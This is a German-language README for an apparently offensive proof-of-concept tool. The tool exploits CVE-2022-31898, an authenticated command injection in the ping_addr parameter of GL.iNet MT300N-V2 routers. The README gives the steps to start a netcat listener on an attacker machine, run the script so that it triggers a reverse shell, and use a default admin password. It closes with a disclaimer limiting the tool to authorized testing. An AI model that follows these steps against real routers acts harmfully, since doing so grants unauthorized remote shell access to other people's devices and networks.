
Authentifiziertes Tool zur Befehlsinjektion (CVE-2022-31898) - HACKCONRD 2026.
__ __ _____ _
| \/ | | __ \ | |
| \ / | __ _ _ __ __ _ ___ | |__) | _ _ __ ___| |__
| |\/| |/ _` | '_ \ / _` |/ _ \| ___/ | | | '_ \ / __| '_ \
| | | | (_| | | | | (_| | (_) | | | |_| | | | | (__| | | |
|_| |_|\__,_|_| |_|\__, |\___/|_| \__,_|_| |_|\___|_| |_|
__/ |
|___/
Dieses Repository enthält einen technischen Proof of Concept (PoC) für eine Remote Command Execution (RCE)-Schwachstelle, die in den GL.iNet MT300N-V2 (Mango) und anderen Modellen mit Firmware-Versionen unter 3.215 gefunden wurde.
Der Fehler besteht im Parameter ping_addr der Diagnose-API und ermöglicht es einem authentifizierten Angreifer, beliebige Systembefehle über Shell-Metazeichen (;) auszuführen.
Öffnen Sie ein Terminal auf Ihrem Angreifer-Rechner (Kali Linux) und starten Sie einen Netcat-Listener:
nc -lvnp 9292
Verwenden Sie den folgenden Befehl, um die Reverse Shell auszulösen:
python3 mangopunch.py -R <TARGET_IP> -L <YOUR_IP> -l <YOUR_LISTERNER_PORT> -p <PASSWORD>
| Flag | Vollständiger Name | Beschreibung | Standard |
|---|---|---|---|
-R | --rhost | IP des entfernten Ziels (Router) | Erforderlich |
-P | --rport | Web-Verwaltungsport | 443 |
-L | --lhost | Listener-IP (Kali/Angreifer) | Erforderlich |
-l | --lport | Listener-Port | Erforderlich |
-p | --pwd | Administrator-Passwort | goodlife |
-t | --https | HTTPS aktivieren | False |
Haftungsausschluss: Dieses Tool dient ausschließlich Bildungs- und autorisierten Sicherheitstestzwecken. Der Autor ist nicht für missbräuchliche Verwendung verantwortlich.